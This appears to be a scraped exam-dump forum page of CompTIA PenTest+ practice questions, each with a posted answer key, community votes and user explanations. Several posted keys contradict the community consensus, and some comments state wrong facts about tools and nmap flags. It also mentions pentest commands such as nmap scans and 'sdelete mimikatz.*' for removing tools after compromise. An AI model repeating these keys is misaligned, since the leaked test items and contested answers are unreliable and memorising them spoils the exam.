| | _spid0767 | False | False | False | | _sp_id.0767 | False | False | False |  Part 3 #remediate source Lines 21 & 24 upvoted 12 times   Caoilfhion 9 months, 2 weeks ago Love that you've pointed out all the vulnerabilities, but the question is asking the test taker to remediate ONLY ONE and the MOST vulnerable issue shown. Comptia has deemed the certificate as the most vulnerable thing, but others argue for the HTML issue (which I also think should be fixed, but here we are). Taking this cert for my college coursework, and they specifically went over the PBQ to confirm that they're looking for cert remediation. Just a heads up. :) upvoted 9 times   outnumber_gargle024 3 months, 3 weeks ago LFG hoot hoot upvoted 3 times   mdl0305 9 months, 3 weeks ago for part 2, is false or true a checkmark in the box upvoted 4 times   RRabbit Highly Voted  1 year, 8 months ago Generate a Certificate Signing Request (CSR): This step is the first step in the process of obtaining a new certificate. The CSR is a file that contains information about the website and the organization that operates it, as well as a public key. This file is then sent to a Certificate Authority (CA) to request a new certificate. Submit CSR to the CA: Once the CSR is generated, it is sent to the chosen CA. The CA will then validate the information in the CSR and issue a new certificate. Install re-issued certificate on the server: Once the new certificate is issued, it needs to be installed on the server. This step ensures that the new certificate is properly configured and can be used to secure the website. Remove certificate from server: After the new certificate is installed, the old certificate needs to be removed from the server to avoid any confusion or security issues. upvoted 10 times   Johnny34 Most Recent  8 months, 3 weeks ago Can anyone explain why the ASP.net cookie is bad? upvoted 4 times   Caoilfhion 9 months, 2 weeks ago Heads up: THIS question was asking the test taker to remediate the MOST vulnerable thing. Comptia has deemed the certificate as the most vulnerable thing. HOWEVER, watch the wording because some students have reported being asked to remediate all 3! Good luck, guys! upvoted 6 times   user548 11 months, 2 weeks ago #remediatecertificate Step 1: Generate Certificate Signing Request Step 2: Submit CSR to the CA -  Step 3: Install re-issued certificate on the server Step 4: Remove certificate from the server upvoted 3 times   user548 11 months, 2 weeks ago #remediatesource LINE 6-9 The CSRF token is embedded in the HTML code. While not necessarily a vulnerability on its own, the way it is used in the code can potentially lead to security issues if not handled properly. LINE 10-12 The script tag is inserted within the select element. This allows for potential injection of arbitrary JavaScript code, which can be a security vulnerability XSS. LINE 14 The action attribute of the form element is populated with data from the server without proper escaping or validation. Depending on how the server handles this input, it might be a potential vulnerability. Line 20-26 The code contains multiple instances of input elements where the value attribute is populated with data from the server without proper escaping or validation. This can be a security risk if the data is not sanitized and validated correctly. upvoted 4 times   user548 11 months, 2 weeks ago #remediatecookies | Order | HTTP | SECURE | SameSite | |---|---|---|---| | 1 | False | True | True | | 2 | False | False | False | | 3 | False | False | False | | 4 | False | False | False | | 5 | False | False | False | | 6 | False | False | False | | 7 | False | False | False | | 8 | False | False | False | | 9 | False | False | False | upvoted 2 times   OnA_Mule 1 year, 5 months ago The way this question is worded, it seems to have 2 parts. Part 1: Which is the highest vulnerability? Part 2: Remediate the vulnerability. For Part 1, everyone is assuming the expired certificate is the greater vulnerability, but I think having admin credentials in the source code of the web page is a much greater vulnerability than an expired certificate. The expired cert is definitely bad, but giving out admin credentials is so much worse. So getting rid of the commented admin and password lines should be the remediation. If you think a certificate is more important than admin rights to the website, by all means, choose this option, but I'll be going with the more  severe vulnerability. upvoted 1 times   Caoilfhion 9 months, 2 weeks ago I agree with you, only because it feels like everyone and their mother knows to "inspect" to find that kind of stuff, even nontechie people. But unfortunately, CompTia has deemed the certificate the main problem. Taking this exam for my college degree, and the professor went over this PBQ with a "don't get tripped up here, they're just looking for the cert". It's the only PBQ directly from the exam he went over because of how much people trip up on this one, fixing all 3 or the "wrong" one :\ upvoted 3 times   AaronS1990 1 year, 5 months ago Surely the Secure system box needs some input too? It looks to me as though there are checkboxes on the solution picture but nothing is ticked upvoted 1 times   Frog_Man 1 year, 6 months ago Note, there are 3 distinct labs here. Look at question #168 for the full display. People are only answering the first part. upvoted 1 times   [Removed] 1 year, 6 months ago question 168 is wrong and collection with 3 question the are answer in question 168 3 questions answer is wrong upvoted 2 times   [Removed] 1 year, 6 months ago Check again the question 168 i was answer 3 questions with correct answer upvoted 1 times   2Fish 1 year, 7 months ago Step 1 - Generate a Certificate Signing Request Step 2 - Submit CSR to the CA Step 3 - Install re-issued certificate on the server Step 4 - Remove Certificate from Server https://www.examtopics.com/discussions/comptia/view/53668-exam-pt0-001-topic-1-question-142-discussion/ upvoted 6 times   Sborrainculo 1 year, 9 months ago There is a misalagment between what you guys suggest in step 3 - 4 and the suggested answer. Step 3 Install Step 4 Remove. But it makes sense to do the opposite: remove the certificate first then install the new one upvoted 2 times   boxv4 1 year ago You remove last. I've had to update CA signed certs and what we do is technically replace the file itself, but what gets updated is the cacerts file which contains the details of the loaded cert file that is either in p7b format or cer file. The removal part is optional for when we do it, as we remove the files as necessary or just keep them in place with a name.old to keep a  historical track of the times we've updated the certificates. upvoted 2 times   Caoilfhion 9 months, 2 weeks ago You don't remove an old cert before installing the new one, because you will close your connection unexpectedly and lock yourself out. Cert removal is last, if at all... upvoted 1 times   ryanzou 1 year, 11 months ago Step 1 - Generate a Certificate Signing Request Step 2 - Submit CSR to the CA Step 3 - Install re-issued certificate on the server Step 4 - Remove Certificate from Server upvoted 6 times   RightAsTain 1 year, 11 months ago An expired cert still has the public key and can complete the TLS handshake. I trouble shoot cert issues at work all the time so that definitely isn't a vulnerability. Look at the HTML. The username and password are commented out. Who cares about cookies and a secure connection when you can have access to the admin account. lol upvoted 8 times   [Removed] 1 year, 10 months ago As a VM engineer by day....an expired cert is most definitely a high severity vulnerability. upvoted 8 times   Mr_BuCk3th34D 1 year, 9 months ago How can you tell if the cert is expired? What if one created that question from old exam back in 2018? There's no info there to confirm that the cert is really expired. Unsecure cookies seems like a higher vulnerability to me. Talking about the username and password, those are not the credentials are just the field names. upvoted 3 times   boxv4 1 year ago On the coockies, there were sessions dated the year 2019. therefore we can safely assume the certs have expired. I asked myself the same question. upvoted 2 times   Mr_BuCk3th34D 1 year, 9 months ago Also - If the cookie transport security is not set up properly, the hacker can access sensitive information stored in those cookies, regardless if the Web application uses SSL. The attacker can then gather sensitive data stored in those  cookies. upvoted 3 times  Question #12 Topic 1 A Chief Information Security Officer wants a penetration tester to evaluate the security awareness level of the company's employees. Which of the following tools can help the tester achieve this goal? A. Metasploit B. Hydra C. SET D. WPScan Correct Answer: C Community vote distribution C (87%) 13%   Neolot Highly Voted  1 year, 11 months ago Selected Answer: C Definitely C. Social Engineering Toolkit is a way to test your employees security awareness. upvoted 15 times   vicky88__ Most Recent  7 months, 1 week ago Selected Answer: C SET (Social Enginering Toolkit) it's a correct answer to test security awareness all employe upvoted 1 times   bieecop 1 year, 1 month ago Metasploit rapid7 can generate campaign phishing upvoted 1 times   solutionz 1 year, 1 month ago Selected Answer: C When the goal is to evaluate the security awareness level of a company's employees, a common approach is to conduct social engineering attacks to see how the employees respond. This can include phishing campaigns, pretexting, and other manipulative tactics to assess how employees handle potentially malicious scenarios. Among the options provided, the Social-Engineer Toolkit (SET) is a tool specifically designed for performing social engineering attacks. It includes functionalities for creating phishing emails, malicious websites, and other social engineering attacks that can be used to assess how employees respond to various threats. So the correct answer to this question would be: C. SET (Social-Engineer Toolkit) upvoted 1 times   bieecop 1 year, 2 months ago Selected Answer: C The Social Engineering Toolkit (SET) is a tool specifically designed for conducting social engineering attacks. It includes a wide range of attack vectors and techniques to test and evaluate the security awareness of employees. Some of the features and capabilities of SET include: upvoted 1 times   cy_analyst 1 year, 5 months ago  Selected Answer: C The Social Engineering Toolkit (SET) is a tool that can be used by a penetration tester to evaluate the security awareness level of a company's employees. SET provides a framework for simulating various social engineering attacks, such as phishing emails, phone calls, and other techniques. By using SET, a penetration tester can craft convincing simulated attacks to see how employees respond. This can help to identify weaknesses in employee training and develop targeted security awareness training programs. upvoted 2 times   nickwen007 1 year, 6 months ago SET (the Social Engineering Toolkit). SET is a framework designed to help penetration testers evaluate the security awareness level of an organization by simulating real-world social engineering attacks. upvoted 3 times   AaronS1990 1 year, 6 months ago Selected Answer: C SET stands for Social Engineering Toolkit and is a way to test someone's security awareness. It definitely has nothing to do with B upvoted 3 times   2Fish 1 year, 8 months ago Gotta go with C. SET (Social Engineering Toolkit). This toolkit has many options to test employees security awareness. upvoted 4 times   mj944 1 year, 10 months ago Selected Answer: C SET ftw upvoted 2 times   Masco 1 year, 10 months ago correct answer is B upvoted 1 times   dcyberguy 1 year, 10 months ago C, SET stands out for me upvoted 3 times   petercorn 1 year, 11 months ago Selected Answer: C Social Engineering Toolkit is the best answer. upvoted 2 times   Val3nt1n 1 year, 11 months ago Selected Answer: B Hydra is a password cracker upvoted 1 times   Manzer 1 year, 11 months ago Selected Answer: B I'm going with B. Hydra is a password cracker. SET is from the credit card company for their security standards. Metasploit is a tool kit for exploiting websites and WPScan is a toolkit for exploiting Wordpress. upvoted 3 times   Manzer 1 year, 11 months ago Should be C. SET means something else too. upvoted 4 times   Question #13 Topic 1 Which of the following is the MOST common vulnerability associated with IoT devices that are directly connected to the Internet? A. Unsupported operating systems B. Susceptibility to DDoS attacks C. Inability to network D. The existence of default passwords Correct Answer: A Community vote distribution D (97%)   Manzer Highly Voted  1 year, 11 months ago Selected Answer: D The IoT provides a unique opportunity for manufacturers to build devices with the ability to communicate and perform specialized functions. However, because of the lack of rigorous testing, many devices have several insecure defaults that come preconfigured, such as the username and password. In many cases, the manufacturer has hard-coded these credentials and made them very difficult or impossible to remove. This can be dangerous, as once a malicious actor knows the type of device that is in use, they can then research the default username and password online. As a result, the team should research the default credentials for each IoT product you target during the PenTest. Section 12 upvoted 13 times   Ottris Most Recent  2 months, 1 week ago According to CompTIA materials, the answer is A. upvoted 1 times   Etc_Shadow28000 2 months, 2 weeks ago Selected Answer: D The MOST common vulnerability associated with IoT devices that are directly connected to the Internet is: D. The existence of default passwords Many IoT devices come with default usernames and passwords that are often not changed by the users, making these devices easy targets for attackers. upvoted 1 times   LiveLaughToasterBath 8 months, 2 weeks ago Selected Answer: D Via Fortinet: Top IoT vulnerabilities include: 1. Weak/Hardcoded Passwords.... 2. Insecure Networks.... 3. Insecure Ecosystem Interfaces.... 4. Insecure Update Mechanisms.... 5. Insecure or Outdated Components.... 6. Lack of Proper Privacy Protection.... 7. Insecure Data Transfer and Storage.... 8. Improper Device Management. upvoted 2 times   monkeyyyyy 9 months ago Selected Answer: D vote for D upvoted 1 times    solutionz 1 year, 1 month ago Selected Answer: D Internet of Things (IoT) devices often come with various security challenges, and among the listed options, the most common vulnerability is typically the existence of default passwords. Many manufacturers ship IoT devices with easily guessable default usernames and passwords, and if these credentials are not changed, attackers can easily gain unauthorized access to these devices. So the correct answer to this question would be: D. The existence of default passwords. upvoted 2 times   user009 1 year, 5 months ago The MOST common vulnerability associated with IoT devices that are directly connected to the Internet is option D: The existence of default passwords. Explanation: IoT devices that are directly connected to the Internet are often shipped with default passwords that are commonly known and easily guessable. Many users do not change these default passwords, leaving the devices vulnerable to unauthorized access by attackers. Option A, unsupported operating systems, is a vulnerability that can exist on some IoT devices, but it is not as common as default passwords. Option B, susceptibility to DDoS attacks, is a vulnerability that can affect IoT devices that are connected to the Internet, but it is not the most common vulnerability. Option C, inability to network, is not a common vulnerability for IoT devices that are designed to be connected to the Internet. Therefore, the most common vulnerability associated with IoT devices that are directly connected to the Internet is option D, the existence of default passwords. upvoted 3 times   nickwen007 1 year, 6 months ago Many IoT device manufacturers fail to change the default passwords, which makes them vulnerable to attack by malicious actors as they can easily gain access using the default password. upvoted 4 times   Brayden23 1 year, 6 months ago Selected Answer: D D is the correct answer upvoted 4 times   AaronS1990 1 year, 6 months ago Selected Answer: D D, all day long upvoted 3 times   [Removed] 1 year, 7 months ago D is correct upvoted 2 times   Masco 1 year, 10 months ago How is unsupported OS related to a Vulnerability, I go for D upvoted 3 times    bromings 1 year, 10 months ago Selected Answer: D D for sure. Great article @mattmetallica upvoted 3 times   mattmetallica 1 year, 11 months ago I think it's D based on this... https://www.networkworld.com/article/3332032/top-10-iot-vulnerabilities.html upvoted 4 times   petercorn 1 year, 11 months ago Selected Answer: B On October 21, 2016, a widespread distributed denial of service (DDoS) attack shut down large portions of the Internet, affecting services run by Amazon, The New York Times, Twitter, Box, and other providers. The attack came in waves over the course of the day and initially mystified technologists seeking to bring systems back online. Investigation later revealed that the outages occurred when Dyn, a global provider of DNS services, suffered a debilitating attack that prevented it from answering DNS queries. Dyn received massive amounts of traffic that overwhelmed its servers. The source of all of that traffic? Attackers used an IoT botnet named Mirai to leverage the bandwidth available to baby monitors, DVRs, security cameras, and other IoT devices in the homes of normal people. Those botnetted devices received instructions from a yet-unknown attacker to simultaneously bombard Dyn with requests, knocking it (and a good part of the Internet!) offline. upvoted 1 times  Question #14 Topic 1 Which of the following describes the reason why a penetration tester would run the command sdelete mimikatz. * on a Windows server that the tester compromised? A. To remove hash-cracking registry entries B. To remove the tester-created Mimikatz account C. To remove tools from the server D. To remove a reverse shell from the system Correct Answer: B Community vote distribution C (100%)   Manzer Highly Voted  1 year, 11 months ago Selected Answer: C sdelete is used to delete files and folders. This command would delete any folder with mimikatz.* upvoted 10 times   duckduckgooo 9 months, 1 week ago I like adding URL's to answers/tools for others or people that had to validate the answer (me). https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete upvoted 2 times   petercorn Highly Voted  1 year, 11 months ago Selected Answer: C Agree with Manzer upvoted 7 times   Etc_Shadow28000 Most Recent  2 months, 2 weeks ago Selected Answer: C The reason a penetration tester would run the command `sdelete mimikatz.*` on a Windows server that the tester compromised is: C. To remove tools from the server `sdelete` is a command-line utility that securely deletes files, making them unrecoverable. Running `sdelete mimikatz.*` would securely delete the Mimikatz tool and any related files from the server, helping to cover the tester's tracks by removing evidence of the tool's presence and use. upvoted 1 times   monkeyyyyy 9 months ago Selected Answer: C vote for C upvoted 1 times   solutionz 1 year, 1 month ago Selected Answer: C The command `sdelete` is a command-line utility that can be used to securely delete files and cleanse free space on a disk in Windows. `Mimikatz` is a well-known tool used by attackers (and penetration testers) to extract plaintext passwords, hash, PIN code, and Kerberos tickets from memory. In the context of the given command `sdelete mimikatz.*`, the intention is to securely delete all  files related to Mimikatz from the compromised server. So the correct answer to this question would be: C. To remove tools from the server. upvoted 3 times   cy_analyst 1 year, 5 months ago Selected Answer: C The sdelete command is used to securely delete files or free space on a hard drive by overwriting them with random data. Mimikatz is a tool that can be used to extract sensitive information such as passwords from a compromised Windows system. upvoted 3 times   user009 1 year, 5 months ago The reason why a penetration tester would run the command sdelete mimikatz.* on a Windows server that the tester compromised is option C: To remove tools from the server. Explanation: Sdelete is a Windows command-line utility that securely deletes files and folders from a disk by overwriting the data with zeroes or random characters. Mimikatz is a post-exploitation tool that can be used to extract passwords and other sensitive information from a compromised Windows system. In this scenario, the penetration tester has compromised the Windows server and has used Mimikatz to extract sensitive information. The command sdelete mimikatz.* is used to securely delete the Mimikatz tool and any related files from the system to avoid leaving traces of the attack. upvoted 2 times   KingIT_ENG 1 year, 6 months ago CCCCCCCC upvoted 1 times   nickwen007 1 year, 6 months ago SDelete is a command-line utility used to securely delete files, directories and registry entries. It can also be used to remove traces of Mimikatz, a tool used to manipulate Windows authentication mechanisms. To use SDelete to remove Mimikatz, you must enter the command "sdelete -p 1 mimikatz.*" in elevated command prompt. This will overwrite all files that contain the string "mimikatz" with random data, thus removing any trace of Mimikatz from your computer. upvoted 2 times   nickwen007 1 year, 6 months ago The most likely reason why a penetration tester would run the command sdelete mimikatz.* on a Windows server is C. To remove tools from the server. This command can be used to securely delete any tools or malicious files that the tester may have installed while compromising the system, such as Mimikatz or any other malicious code. upvoted 3 times   [Removed] 1 year, 6 months ago C is the answer upvoted 1 times   Masco 1 year, 10 months ago Correct Answer is C upvoted 3 times    bromings 1 year, 10 months ago Selected Answer: C SDelete is a command line utility that takes a number of options. In any given use, it allows you to delete one or more files and/or directories, or to cleanse the free space on a logical disk. SDelete accepts wild card characters as part of the directory or file specifier. upvoted 4 times  Question #15 Topic 1 A penetration tester is scanning a corporate lab network for potentially vulnerable services. Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker? A. nmap 192.168.1.1-5 -PU22-25,80 B. nmap 192.168.1.1-5 -PA22-25,80 C. nmap 192.168.1.1-5 -PS22-25,80 D. nmap 192.168.1.1-5 -Ss22-25,80 Correct Answer: C Community vote distribution C (75%) D (25%)   The_F00L Highly Voted  1 year, 7 months ago Selected Answer: C D is the only answer that doesnt actually RUN so I dont see why that's the majority answer. Looking at nmap --help clearly shows: -PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports We want TCP, so -PS will do the job. So I have to say C. upvoted 13 times   rodwave 3 months, 2 weeks ago This is right, the command for D doesn't work so it wouldn't run. C is the best option here. upvoted 1 times   [Removed] 1 year, 7 months ago what you think about the question 18? upvoted 1 times   RRabbit Highly Voted  1 year, 8 months ago Selected Answer: D The correct answer is D. nmap 192.168.1.1-5 -Ss22-25,80. This command will perform a SYN scan of ports 22 through 25 and port 80 on the IP addresses 192.168.1.1 through 192.168.1.5. This scan will return any potentially vulnerable ports that might be of interest to an attacker. The capital 'S' stands for the SYN flag, which is used to initiate a connection on a TCP port. The lowercase 's' stands for the stealth flag, which is used to hide the source IP address of the scan and make it harder to detect. upvoted 6 times   KeToopStudy 8 months, 4 weeks ago The problem with that is the stealth scan flag is -sS not -Ss... It is not a valid flag the answer D upvoted 4 times   Etc_Shadow28000 Most Recent  2 months, 2 weeks ago Selected Answer: C C. `nmap 192.168.1.1-5 -PS22-25,80`  Explanation: - The `-PS` option performs a TCP SYN ping scan, which sends SYN packets to the specified ports (22-25,80) on the target hosts (192.168.1.1-5) to check if those ports are open. - While this does not perform a full vulnerability scan, it is useful for identifying live hosts with open ports, which can be the first step in identifying potentially vulnerable services. The other options (`-PU` for UDP ping and `-PA` for ACK ping) are less likely to be useful for identifying open ports and potentially vulnerable services in this context. If the -sS option (note the correct lowercase -sS instead of -Ss) is a SYN scan, which is the most effective and common way to scan for open ports. This type of scan sends SYN packets to the specified ports and determines if they are open based on the responses, making it useful for identifying potentially vulnerable services. upvoted 2 times   Paula77 3 months ago Selected Answer: D The -Ss scan will provide information about open ports, which is essential for assessing potential risks. upvoted 1 times   aa9ee6c 3 months, 2 weeks ago C is definitely the correct answer upvoted 1 times   Kirby87 10 months, 1 week ago The correct answer to the question is option B: nmap 192.168.1.1-5 "PA22-25,80". The "PA" option specifies a port scan and identifies services based on their response to specific probes. This scan will return open ports 22-25 and 80, and attempt to identify potential vulnerabilities in those services. upvoted 2 times   solutionz 1 year, 1 month ago Selected Answer: D Nmap is a widely used tool for network discovery and security auditing. Different options can be used to perform various types of scans. In the given context, you would likely want to use a stealthy SYN scan to identify open ports that might be running vulnerable services. The SYN scan is a popular method that's useful in port scanning as it doesn't complete the TCP handshake and is therefore considered "stealthier." The correct option for performing a SYN scan over the specified range of IPs and ports would be: D. `nmap 192.168.1.1-5 -sS 22-25,80` Note the correct flag for a SYN scan is `-sS`, not `-Ss`. Therefore, it appears there may be a typographical error in the options provided, and based on the context, option D should be the correct choice if corrected to `-sS`. upvoted 1 times   nooooo 1 year, 2 months ago Selected Answer: D The -sS option tells the nmap command to perform a TCP SYN scan, which is a stealthy way to scan a network. The 22-25,80 option  tells the nmap command to scan the specified ports, which are commonly used by vulnerable services. Option C, nmap 192.168.1.1-5 -PS22-25,80, will return all open ports that are listening for proxy services, which are not typically vulnerable. upvoted 1 times   MysterClyde 1 year, 3 months ago C is correct. Ss is invalid syntax. But if it were sS, then the answer would be D for sure. upvoted 2 times   POWNED 1 year, 4 months ago Selected Answer: C D is incorrect for an obvious reason running -Ss would result in an error, it would be the correct answer if it were -sS upvoted 3 times   KingIT_ENG 1 year, 6 months ago C is correct answer upvoted 1 times   kenechi 1 year, 6 months ago Selected Answer: C The Ports 22,25,80 are all tcp ports. A syn scan (-sS) would have done the job but since it is not listed, the -PS flag would also do a tcp syn scan. upvoted 4 times   [Removed] 1 year, 6 months ago yes C is correct upvoted 2 times   [Removed] 1 year, 7 months ago D is correct upvoted 1 times   dcyberguy 1 year, 10 months ago The only issue is have is that it is write as -Ss instead of -sS upvoted 1 times   Vikt0r 1 year, 7 months ago I think it's a typo. upvoted 1 times   [Removed] 1 year, 7 months ago C is corret upvoted 1 times   Ahegi 1 year, 6 months ago this has to be a typo. all -P* are host discovery scans. This will not identify vulnerable ports. upvoted 1 times   BirdLawyer 3 months, 3 weeks ago They do a host discovery first and then they scan the ports, so sS and PS are essentially the same thing and they both send TCP Syn packets, except PS does a host discovery beforehand upvoted 1 times    petercorn 1 year, 11 months ago Selected Answer: C There is no -Ss switch unless is -sS. upvoted 4 times   Neolot 1 year, 11 months ago Selected Answer: C https://www.examtopics.com/discussions/comptia/view/66643-exam-pt1-002-topic-1-question-42-discussion/ upvoted 4 times   Manzer 1 year, 11 months ago Looks like both according to this post. https://www.linuxquestions.org/questions/linux-newbie-8/difference-beween-nmap-ps-and-ss-4175534781/ upvoted 3 times   Manzer 1 year, 11 months ago Selected Answer: D PS/PA/PU are host discovery scans, SS is a Scan Technique. https://nmap.org/book/man-briefoptions.html upvoted 1 times  Question #16 Topic 1 A penetration tester was brute forcing an internal web server and ran a command that produced the following output: However, when the penetration tester tried to browse the URL http://172.16.100.10:3000/profile, a blank page was displayed. Which of the following is the MOST likely reason for the lack of output? A. The HTTP port is not open on the firewall. B. The tester did not run sudo before the command. C. The web server is using HTTPS instead of HTTP. D. This URI returned a server error. Correct Answer: A Community vote distribution D (96%) 4%   sidonpc Highly Voted  2 years ago Selected Answer: D This is incorrect It should be D mainly because if the firewall was blocking the port than none of the web directories would have successful(200 codes) the 500 code is a server side error code meaning the correct answer is D. upvoted 23 times   rintaka21 2 years ago agree on this one, it should be D. upvoted 8 times   RRabbit Highly Voted  1 year, 8 months ago Selected Answer: D The most likely reason for the lack of output is D. This UR(L) returned a server error. This is because the output of the dirb command shows that the profile URL responded with an HTTP Status Code 500, which indicates that the web server experienced an internal server error when the request was received. This could be caused by a number of things, such as a misconfigured server or a syntax error in the code. A is incorrect because the output of the dirb command indicates that the HTTP port is open. B is incorrect because the output indicates that the command was run without sudo and still produced a  response. C is incorrect because the output of the dirb command indicates that the web server is using HTTP, not HTTPS. upvoted 11 times   pizzaThyme Most Recent  1 month, 1 week ago Selected Answer: D Gots to be D my boy. 500 Internal Server Error as compared to 200 OK status for get/post requests upvoted 1 times   MeisAdriano 1 month, 2 weeks ago Selected Answer: D As you can see in the generated result, the...profile generated an HTTP STATUS 500 (internal server error), others have HTTP STATUS 200 ("OK") upvoted 2 times   LiveLaughToasterBath 8 months, 1 week ago Selected Answer: D I googled the 500 error, for my own piece of mind. Shows as a generic, server-side error. upvoted 1 times   bracokey 10 months ago The answer is A. this is because of the characteristics of port 3000. This port functions as a local host web dev port and it would seem not to respond to remote requests like port 80, 443 etc. A bit like ip 127.0.0.1 upvoted 1 times   KeToopStudy 9 months ago The port is not filtered by the firewall... if that was the case you wold not receive 200 responses. And ports can be assign any function you want. It is not obligatory for a web server to run on 80/443, it can run on whathever port you want. upvoted 1 times   Skater_Grace 11 months, 2 weeks ago Selected Answer: D I think it is D. upvoted 1 times   bieecop 1 year, 2 months ago Selected Answer: D Based on the provided output, the penetration tester performed a directory brute force using the Dirb tool on the target web server at http://172.16.100.10:3000. The output shows several URLs that were scanned, including http://172.16.100.10:3000/profile, which returned a server error (CODE: 500). A server error (HTTP status code 500) typically indicates an issue on the server side, such as a misconfiguration or an internal error that prevented the proper handling of the request. This can result in a blank page or an error message being displayed. upvoted 1 times   MysterClyde 1 year, 3 months ago The answer is D. This is a classic error a web admin or end user reports: https://support.cpanel.net/hc/en-us/articles/360051006293--HTTP-ERROR-500-PHP-website-blank-showing-a-white-page-or-Internal-Server-Err upvoted 1 times   KingIT_ENG 1 year, 6 months ago D is correct upvoted 2 times    beamage 1 year, 6 months ago Selected Answer: A The client would have received a 500 error code in the browser, Not a blank page. Firewall I'm thinking.... upvoted 2 times   [Removed] 1 year, 6 months ago D is correct upvoted 2 times   beamage 1 year, 6 months ago When you visit a website your browser sends a request over to the server where the site is hosted. The server takes this request, processes it, and sends back the requested resources (PHP, HTML, CSS, etc.) along with an HTTP header. The HTTP also includes what they call an HTTP status code. A status code is a way to notify you about the status of the request. It could be a 200 status code which means “Everything is OK” or a 500 status code which means something has gone wrong. upvoted 1 times   [Removed] 1 year, 6 months ago Read again D is thevanswer upvoted 2 times   The_F00L 1 year, 7 months ago Answer is D. Know your ouptut, and know your HTTP. Keep an eye on those response codes. 500 is a server error. upvoted 5 times   chameleon_eh 1 year, 8 months ago The answer is D, based on the error code. https://developer.mozilla.org/en-US/docs/Web/HTTP/Status upvoted 4 times   Masco 1 year, 10 months ago The correct answer is D and I second sidonpc upvoted 3 times   petercorn 1 year, 11 months ago Selected Answer: D Agree with answer D. upvoted 3 times   petercorn 1 year, 11 months ago The HTTP status code 500 is a generic error response. It means that the server encountered an unexpected condition that prevented it from fulfilling the request. upvoted 4 times  Question #17 Topic 1 A penetration tester was conducting a penetration test and discovered the network traffic was no longer reaching the client's IP address. The tester later discovered the SOC had used sinkholing on the penetration tester's IP address. Which of the following MOST likely describes what happened? A. The penetration tester was testing the wrong assets. B. The planning process failed to ensure all teams were notified. C. The client was not ready for the assessment to start. D. The penetration tester had incorrect contact information. Correct Answer: B Community vote distribution B (100%)   RRabbit Highly Voted  1 year, 8 months ago Selected Answer: B Answer: B. The planning process failed to ensure all teams were notified. Example: The penetration tester was unaware that the SOC had set up sinkholing on his IP address and was blocked from accessing the client's IP address because the SOC team was not notified of the penetration test. upvoted 8 times   pizzaThyme Most Recent  1 month, 1 week ago Selected Answer: B B. Either the teams was not made aware by accident and corrective action was taken by the SOC, OR the team was intentionally left in the dark in the case of red vs. blue / purple teaming exercises. I guess based on the fact that the pentester is surprised, it would only make sense that the SOC was not made aware. :) upvoted 1 times   [Removed] 9 months, 3 weeks ago Selected Answer: B I'm on blue team and this is how we test our SOCs. upvoted 2 times   IYKMba 1 year, 1 month ago I choose D upvoted 1 times   solutionz 1 year, 1 month ago Selected Answer: B Sinkholing is a practice where traffic is redirected away from its original destination, often to a benign location, in response to suspicious or malicious activity. In the context of a penetration test, if the Security Operations Center (SOC) has sinkholed the penetration tester's IP address, it could indicate that the SOC was not properly informed of the authorized testing. Therefore, the most likely explanation for this occurrence is that there was a failure in the planning process to ensure that all relevant teams were properly notified of the upcoming penetration test. The correct answer to this question would be: B. The planning process failed to ensure all teams  were notified. upvoted 1 times   nickwen007 1 year, 6 months ago Sinkholing is a security technique used to redirect malicious traffic away from its intended target. It involves creating a “black hole” of sorts by setting up a network of servers that will intercept and discard any packets sent to an IP address associated with malicious activity. This helps to prevent the malicious traffic from reaching its destination, thus reducing the impact of the attack. upvoted 3 times   TCSNxS 1 year, 7 months ago Answer is B. In a real world scenario, clients loved to test the ability of their SOCs to detect their PenTesters. Easiest way to was not inform them. upvoted 4 times  Question #18 Topic 1 An Nmap scan shows open ports on web servers and databases. A penetration tester decides to run WPScan and SQLmap to identify vulnerabilities and additional information about those systems. Which of the following is the penetration tester trying to accomplish? A. Uncover potential criminal activity based on the evidence gathered. B. Identify all the vulnerabilities in the environment. C. Limit invasiveness based on scope. D. Maintain confidentiality of the findings. Correct Answer: C Community vote distribution B (56%) C (44%)   masso435 Highly Voted  1 year, 10 months ago Selected Answer: C I think the wording is tricky. Yes both applications scan for vulnerabilities but not all vulnerabilities. This indicates it will find vulnerability outside of WordPress and SQL based on the wording alone. upvoted 10 times   shakevia463 1 year, 7 months ago Doesnt mean hes not attempting to find all vulnerabilites.... he is trying to find them. upvoted 3 times   dcyberguy Highly Voted  1 year, 10 months ago Selected Answer: B Identifying Vulnerabilities should be the clear choice upvoted 8 times   pizzaThyme Most Recent  1 month, 1 week ago Selected Answer: B I leaned toward B when I first read this but MAN I hate the way they word stuff like this. I hope I don't see this during my exam. Never have I seen so many professionals polarized on some of these questions before as I have with PT0-02. upvoted 1 times   Kmelaun 1 month, 1 week ago This is often with CompTIA exams. upvoted 1 times   MeisAdriano 1 month, 2 weeks ago Selected Answer: B WPScan is used for wordpress vulnerability SQLmap is used to find sql injection vulnerability. If the pentester already found opened doors with nmap, WPScan and SQLmap is just to complete ALL potential vulnerabilities not C because WPScan and SQLmap are not specified to limit invasiveness, the just find vulnerability in a specific purpose upvoted 1 times   djash22 2 months, 1 week ago  However, considering the specificity of the tools (WPScan for WordPress vulnerabilities and SQLmap for SQL injection vulnerabilities), it would be more accurate to say the tester aims to identify

Use Quizgecko on...
Browser
Open
Browser
Browser